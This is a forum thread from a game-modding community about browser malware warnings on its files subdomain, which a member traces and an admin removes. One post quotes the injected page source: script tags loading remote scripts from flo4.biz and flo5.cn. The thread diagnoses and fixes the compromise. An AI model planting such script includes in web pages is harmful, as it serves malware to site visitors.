Hello, for *weeks*, Chrome is showing me warnings whenever I open a thread with shiningted's avatar in it, because it is hosted in files.co8.org, which is infected by malware. files.co8.org includes code from flo4.biz, which is a malware hoster. Please clean this up! Regards, Storm
Yeah, I get that warning on Firefox whenever I want to download anything (soundtrack samples, or any files) as well. Perhaps something for Taluntain to check out?
This is an old problem. Taluntain said that flo4.biz is not on our server, and that probably a neighboring IP on the network was infected and Google flagged ours as well. Agetian has requested a review from Google a couple times now, and Google has responded that they've checked the site and found it clean, and that they'll remove the warning, but then they never do. Not much else we can do. :shrug: It's sort of like dealing with the monolithic telephone or cable company.
No, check files.co8.org. This is the sourcecode of the page that is served when I go to files.co8.org: Code: <meta http-equiv="refresh" content="0; url=http://www.co8.org/forum"><script src=http://flo4.biz/1.txt></script><script src=http://flo5.cn/1.txt></script></script> See that script include there? That's the malware inclusion part. Most likely scenario: co8.org was hacked and that snippet was put there to infect visitors of files.co8.org (most likely an automated hack/trojan, there are several out there that do something like this). The only way to clean this up is to remove the offending code snippet from files.co8.org, *then* contact google (although google will most likely unflag files.co8.org once it respiders it). Storm
That one file on the files subdomain (which is completely separate from the main Co8 site) actually was infected. Someone apparently uploaded the old, infected index at some point after the move of the files subdomain off the old server during the move of the files to the new server (probably via an old, infected backup - this file was clean when I checked it last). In any event, I've cleaned it up now, so it should all be fine. Sorry for the inconvenience and if you spot anything like that in the future, let us know directly!
Good police work! I'm glad something was finally found! :thumbsup: I've never been a believer in the "false alarm".
AFAIK that site was shut down a long time ago. Such exploit redirects usually have a very short TTL so they just remain as annoyances. It's not an infection in the virus sense of the word.
As pointed out already, the site was most likely down anyway. Usually they exploit security vulnerabilities in your browser or any installed plugin to execute code on your computer. From there on, it works just like any other trojan/virus infection. What helps: Keep your browser and any plugins (Especially Flash + Adobe Reader) up to date.
Thanks guys, noted and appreciated. I'll be keeping my stuff updated. A question if I may? Completely, well at least kind of off topic, what is your opinion of Windows Defender? Can, should it be trusted? Is it enough by itself? Thanks in advance.
Definetly not. If you don't want to pay for Anti-Virus, and if you can live with a daily ad-popup on update, use Avira: http://www.avira.com/en/pages/index.php It's quite good, really.